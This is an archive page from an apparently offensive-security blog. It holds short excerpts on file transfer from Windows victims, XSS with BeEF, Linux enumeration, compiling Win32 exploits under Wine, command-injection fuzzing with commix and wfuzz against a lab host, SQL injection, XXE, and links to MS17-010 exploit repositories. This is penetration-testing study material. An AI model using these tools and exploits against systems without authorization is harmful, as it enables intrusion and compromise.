Month: February 2019
Transfer files – Windows
Several methods are described here for transferring files between a Windows victim system and the attack box. Start […]
XSS – Cross Site Scripting
BeEF Framework: BeEF is native in Kali and is a browser exploitation framework. From the vulnerable website, insert the snippet below […]
Linux Enum
Useful tools and methods for Linux enumeration. LinEnum.sh collects Linux system info and suggests exploits and privilege escalation paths: https://github.com/rebootuser/LinEnum.git […]
Vulnerability Scanning – OpenVAS
This post covers setting up OpenVAS 9 with the Greenbone Security Assistant. The dashboard: OpenVAS (Open Vulnerability Assessment System) is an open-source […]
Compiling exploits to Windows on Kali
Compile Win32 exploits with Wine. First install MinGW:

    wget http://downloads.sourceforge.net/project/mingw/Installer/mingw-get-setup.exe
    wine mingw-get-setup.exe
    # (select mingw base and c++, menu -> apply changes, quit)

    wine regedit
    # (HKCU\Environment: add string PATH = c:\windows;c:\windows\system;c:\MinGW\bin)
    rm mingw-get-setup.exe

Install some libs MinGW needs:

    wget http://gojhonny.com/misc/mingw_bin.zip
    unzip mingw_bin.zip -d /root/.wine/drive_c/windows/
    rm mingw_bin.zip

Running the compiler (link against ws2_32 for Winsock):

    wine mingw32-gcc.exe foo.c -o foo.exe -lws2_32
    wine mingw32-g++.exe foo.cpp -o foo.exe -lws2_32
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection.

Commix:

    commix -r /home/workdir/email.req --auth-cred=admin:password --all --batch --level 3

wfuzz:

    wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b "PHPSESSID=077dn044qmuh2ut41tksedvlv2" -d "check=FUZZ" http://10.10.10.105/diag.php
curl […]
SQLMap
SQLMap is a tool that automates scanning for and exploitation of SQL injection. Below is some […]
SQL Injection – RCE and LFI Methods
Upload PHP Command Injection: the following can be used to get RCE / command execution when the target is vulnerable to […]
XXE/XML Attack
Malicious DTD: the following snippet can be used to get local file inclusion or remote command execution against a vulnerable XML parser. […]
MS17-010
Resources for the MS17-010 exploit:
https://github.com/3ndG4me/AutoBlue-MS17-010
https://github.com/helviojunior/MS17-010

Scan for vulnerable MS17-010 hosts:

    nmap --script smb-vuln* -p 139,445 10.1.1.22
https://github.com/claudioviviani/ms17-010-m4ss-sc4nn3r